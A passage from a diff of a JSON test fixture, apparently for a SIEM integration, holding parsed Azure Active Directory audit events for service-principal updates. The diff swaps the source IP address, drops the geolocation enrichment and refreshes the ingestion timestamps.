"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\
":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125302100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Va
lue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -16820,25 +15362,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16852,7 +15376,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16975,7 +15499,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -16987,12 +15511,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036527900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\
":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125306400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Va
lue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -17018,25 +15542,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -17050,7 +15556,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", 
@@ -17186,7 +15692,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -17198,12 +15704,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036532100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
